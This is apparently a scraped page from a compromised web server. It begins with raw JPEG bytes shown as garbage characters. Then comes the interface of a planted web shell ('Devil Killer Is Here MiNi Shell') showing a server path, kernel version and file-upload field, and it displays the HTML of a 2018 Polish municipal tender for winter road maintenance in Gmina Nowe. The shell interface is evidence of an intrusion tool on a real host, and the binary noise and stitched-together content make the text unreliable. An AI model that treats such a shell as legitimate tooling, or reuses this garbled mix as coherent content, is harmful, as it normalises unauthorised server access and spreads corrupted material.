JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181116/649012-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 649012-N-2018 z dnia 2018-11-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Nowe</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Nowe</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">9235103800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Pl. Św. Rocha</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">5</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">86170 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowe</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">kujawsko-pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">52 33 37 210</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">fundusze@gminanowe.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">52 33 28 466</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.gminanowe.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.gminanowe.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej na adres Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Plac Św. Rocha 5, 86-170 Nowe</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IKS.271.17.2018.MC</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> Przedmiotem zamówienia jest wykonanie usługi polegającej na zimowym utrzymaniu dróg i ulic na terenie Gminy Nowe w okresie od 01.12.2018 do 31.03.2019r., przy czym w ostatnich 7 dniach realizacji przedmiotu zamówienia Wykonawca zobowiązany zostanie do wykonania czynności związanych z posprzątaniem po akcji zima. Pod pojęciem posprzątania po akcji zima rozumie się, zebranie i usunięcie użytego w ,,akcji zimowej" piasku ze wszystkich chodników oraz usuniecie skrzyń z piaskiem. 1. Podział Gminy na strefy.Teren Gminy Nowe został podzielony na trzy strefy kolejności oczyszczania ulic z śniegu i usuwania gołoledzi: I strefa - dotyczy miasta Nowe - Skrzyżowania: ulic Leśnej z Myśliwską, ulicy Wiatracznej z Myśliwską, ulice Wiślana i Rybaki, Komierowskiego z krajową E 91, Komierowskiego z Kolejową.- Podjazdy: ul. Owocowa , ul. Nowy Świat - podjazd przy ZESI, Podgórna - Schody przy ulicy: Leśnej, Brzozowej, Podgórnej, Obywatelskiej, Garbuzy, Spacerowej, Ślusarskiej, Nad Skarpą, Wierzbowa- Aleja 3-go Maja, Aleja 3-go Maja + Przejście przez teren Targowiska do ul. Dworcowej oraz od Jeziora Czarownic do Osiedla Myśliwskiego, schody od posterunku Policji do ul. Podgórnej. - Chodniki do odśnieżania i usuwania gołoledzi: ul. Bydgoska prawa i lewa strona, ul. Bydgoska i przy Parku, Kolejowa i Aleja 3-go Maja przy cmentarzu, ul. Kolejowa, ul. Nowa, cały plac rynku wraz chodnikami (wg wskazań Zamawiającego), ul. Wojska Polskiego - plac parkingowy, obwodnica o/m Nadwiślańskie II, Tczewska prawa i lewa strona do wjazdu na o/m Myśliwskie, Pl. Św. Rocha, Gdańska -amfiteatr, ul. Tczewska od parkingu przy J. Czarownic do drogi gminnej na osiedlu w Bochlinie oraz ul. Bydgoska od Posterunku Policji za Zakłady Mięsne NOVE + za przejście dla pieszych. Chodnik przy ul. Komierowskiego. - Ulice: Gdańska, Rynek, Wojska Polskiego, Grudziądzka, Kościuszki, Zduńska, Gen. Komierowskiego, Kolejowa, Sportowa, Fabryczna, Nowa, Dworcowa, Aleja 3-go Maja, Nowy Świat, Owocowa, Wiatraczna, ulice wokół Hali Widowiskowo- Sportowej, Osiedle Jana Pawła wraz ulicami przyległymi, Hallera, Ślusarska, Obwodnica o/m Nadwiślańskie II strefa ulice - dotyczy miasta Nowe: Wąska, Poprzeczna, Kuchczyńskiego, Myśliwska, Zielona, Brzozowa, Jesionowa, Leśna, Modrzewiowa, Orzechowa, Cisowa, alejka za fabryka KLOSE oraz chodnik przy ul. Kolejowej wraz z chodnikiem od stadionu miejskiego do działek wzdłuż drogi wojewódzkiej, 1000-Lecia, 9-go Maja, Kniatek, Wiślana, os. Nowy Świat, Plac Zamkowy, Akacjowa, Droga Boczna, Cicha, Dębowa, Długa, Długie Ogrody, Garbuzy, Kasztanowa, Klonowa, Kościelna, Krótka, Kwiatowa, Lipowa, Łąkowa, Mroczna, Nad Skarpą, Obywatelska, Podgórna, Pod Murami, Przykop, Rybaki, Sosnowa, Spacerowa, Stanisława Wojnowskiego, Stroma, Szpitalna, Św. Huberta, Świerkowa, Targowisko, Tylna, Wierzbowa, Wodna, Wrzosowa, Zakątek, Zamkowa i trasy autobusów szkolnych w dni powszednie tj. od poniedziałku do piątku.III strefa -pozostałe drogi gminne na terenach wiejskich gminy Nowe.2. Czas, w jakim w strefach I-III należy podjąć działania w przypadku usuwania skutków opadów śniegu i gołoledzi. Wykonawca zobowiązuje się przystąpić do usuwania śniegu i/lub likwidowania gołoledzi w miejscach określanych jako: I strefa odśnieżania zimowego - w ciągu 30 minut od momentu ustania opadów śniegu i/lub przyczyn powodujących gołoledź po uzgodnieniu z przedstawicielem Urzędu Gminy Nowe (Burmistrza Nowego lub Kierownika Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska), II strefa odśnieżania zimowego- w ciągu 2 godzin od momentu ustania opadów śniegu i/lub przyczyn powodujących gołoledź po uzgodnieniu z przedstawicielem Urzędu Gminy Nowe (Burmistrza Nowego lub Kierownika Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska), III strefa odśnieżania zimowego- na wyraźne polecenie przedstawiciela Urzędu Gminy w Nowem (Burmistrz Nowego, Kierownik Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska)3. Pozostałe warunki realizacji zamówienia. 1) Przez okres zimowy Wykonawca, który składa ofertę na I część zamówienia na terenie miasta ustawi 20 pojemników na piasek zmieszany z chlorkiem sodu przeznaczony do usuwania gołoledzi na skrzyżowaniach i strefie I i II według wskazań Zamawiającego i/lub według zaistniałych potrzeb. Wykonawca, który składa ofertę na II część zamówienia w III strefie ustawi 5 pojemników na piasek zmieszany z chlorkiem sodu przeznaczony do usuwania gołoledzi według wskazań Zamawiającego i/lub według zaistniałych potrzeb. Wykonawca jest zobowiązany do systematycznego uzupełniania piasku w skrzyniach.2) Celem wyeliminowania gołoledzi należy: a) Plac Rynku wraz z chodnikami znajdującymi się w obrębie starego miasta przesypywać samym piaskiem (bez dodatku: chlorku sodu i/lub soli). b) Pozostałe jezdnie, ulice, skrzyżowania ulic przesypywać piaskiem z dodatkiem chlorku sodu lub solą (w zależności od potrzeb). Pod pojęciem zwalczanie gołoledzi rozumie się w szczególności zamarzanie cienkiej warstwy wody, tzw. zamarzanie kropel deszczu, mżawki na powierzchni oziębionego pasa drogowego do temperatury niższej lub nieco wyższej od 0o C.3) Na żądanie Zamawiającego Wykonawca usunie i wywiezie zalegający na parkingach i poboczach dróg śniegu, jeśli jego ilość spowoduje zakłócenie płynności ruchu w obu kierunkach i uniemożliwi parkowanie samochodów.4) Usuwanie śniegu i/lub gołoledzi z ciągów pieszych polegać ma na oczyszczeniu chodników przyległych do nieruchomości będących własnością Gminy Nowe z wyłączeniem chodników przyległych do nieruchomości w zarządzie administracji PUM Nowe przez zgarnięcie śniegu, posypywanie piaskiem likwidując gołoledź oraz skuwanie zadeptanego śniegu. 5) Wykonawca zobowiązany jest do prowadzenia ciągłej obserwacji sytuacji pogodowej oraz monitorowania stanu dróg i wydawania dyspozycji operatorom sprzętu po uzgodnieniu z upoważnionymi pracownikami UG Nowe (Burmistrz Nowego, Kierownik Referatu Inwestycji, Gospodarki Komunalnej i Ochrony Środowiska. 6) Wykonawca ponosi całkowitą odpowiedzialność za szkody wyrządzone osobom trzecim i Zamawiającemu, które powstały w wyniku wykonywanych lub nienależycie wykonanych prac przez Wykonawcę w czasie realizacji usługi. 7) Opróżnianie koszy ulicznych z odpadów komunalnych z terenu miasta należy przyjąć maksymalnie 2 razy w tygodniu.8) Wykonawca ma obowiązek znać i stosować w czasie prowadzenia usług wszelkie aktualne obowiązujące przepisy dotyczące ochrony środowiska, prawa o ruchu drogowym, o drogach publicznych, prawa budowlanego i inne związane z zakresem wykonywanych prac. 11. Zamawiający wskazuje miejsca składowania piasku użytego w akcji zimowej na terenie składowiska odpadów w Milewie lub inne (gm. Nowe). - Baza przy siedzibie Zarządu Pum Nowe ,Plac Św.Rocha 510)Bieżące oczyszczanie z liści, śniegu, lodu, błota nawierzchni dróg, chodników, placów, parkingów, przystanków komunikacji oraz kratek ściekowych wód opadowych w ulicach, jak również usuwanie zanieczyszczeń powstałych w wyniku zimowego utrzymania (piasku i innych środków używanych przeciwko gołoledzi).11) Wykonawca podczas realizacji przedmiotu zamówienia zobowiązany jest wywozić zebrane odpady (poza śniegiem) do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych.12) Zapewnienie dodatkowego sprzątania w mieście przed uroczystościami i świętami zgodnie z poleceniem Zamawiającego, o którym Wykonawca zostanie zawiadomiony przez Zamawiającego na 7 dni przed planowanymi uroczystościami oraz świętami (max do 4 razy w roku) - dotyczy tylko I części zamówienia.13) W celu prawidłowego sporządzenia oferty proponuje się wizję lokalną terenu, na którym realizowane ma być zamówienie. 14) W okresie obowiązywania umowy Wykonawca zobowiązany jest do wskazania osoby odpowiedzialnej za jej realizację w imieniu Wykonawcy. Wskazanie osoby powinno zawierać imię, nazwisko, stanowisko służbowe, kontaktowy numer telefonu oraz adres e-mail. Zmiana osoby nie stanowi zmiany umowy.Symbol Centralnej Klasyfikacji Produktów wg Wspólnego Słownika Zamówień CPV90620000-9 - Usługi odśnieżania 90630000-2 - Usługi usuwania oblodzeń90610000-6 - Usługi sprzątania i zamiatania ulicZatrudnienie na umowę o pracęZgodnie z art. 29 ust. 3a Pzp Zamawiający określa następujące wymagania dotyczące zatrudniania przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji przedmiotu zamówienia, których wykonanie polega na wykonaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy ( Dz. U. z 2014 r. poz. 1502, z póź. zm.) :Wszystkie osoby uczestniczące w realizacji przedmiotu zamówienia świadczące roboty budowlane lub usługi, poza wymienionymi poniżej muszą być zatrudnione na umowę o pracę. W przypadku osób fizycznych, które są Wykonawcą lub podwykonawcą zamówienia i osobiście będą wykonywały określone czynności wchodzące w zakres zamówienia, obowiązek zatrudnienia na umowę o pracę nie obowiązuje. Obowiązek zatrudnienia na umowę o pracę dotyczy osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o pracę. Tak, więc wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane w wykonywaniem usług, czyli tzw. pracowników fizycznych.Zamawiający wymaga, stosownie do art.29 ust. 3a ustawy Pzp, zatrudnienia na podstawie umowy o pracę, w rozumieniu przepisów ustawy z dnia 26 czerwca 1974r. - Kodeks pracy (Dz.U. z 2016r. poz. 1666 ze zm.), przez wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:1) oczyszczanie z liści, śniegu, błota nawierzchni dróg, chodników, parkingów, placów, przystanków komunikacji, kratek ściekowych wód opadowych w ulicach,2) usuwanie zalegającego śniegu i gołoledzi,3) wywóz zebranych odpadów do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych,5) przedkładanie szczegółowego raportu z zaangażowanego sprzętu,6) koordynowanie prac pracowników,7) obsługa sprzętu zaangażowanego w wykonanie umowy,Sposób dokumentowania zatrudnienia osób, o których mowa w art. 29 ust. 3a: Wykonawca przed podpisaniem umowy przedłoży Zamawiającemu oświadczenie, że osoby wskazanymi powyżej, które będą uczestniczyć w realizacji przedmiotu zamówienia będą zatrudnione na podstawie umowy o pracę, zarówno przez Wykonawcę jak i podwykonawcę. W przypadku zmiany na stanowisku osób, o których mowa wyżej najpóźniej z chwilą podjęcia przez nową osobę pracy, bądź w terminie trzech dni roboczych od przyjęcia przez pracownika zmiany warunków pracy.Uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 29 ust. 3 a Pzp oraz sankcji z tytułu niespełnienia tych wymagań: Uprawnienia i sankcje, o których mowa powyżej określone zostały we wzorze umowy stanowiącym Załącznik Nr 9 do SIWZ. Dodatkowo sposób realizacji zamówienia określony został w Załącznikach Nr 9 do SIWZ - Wzór umowy. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90620000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90630000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90610000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> 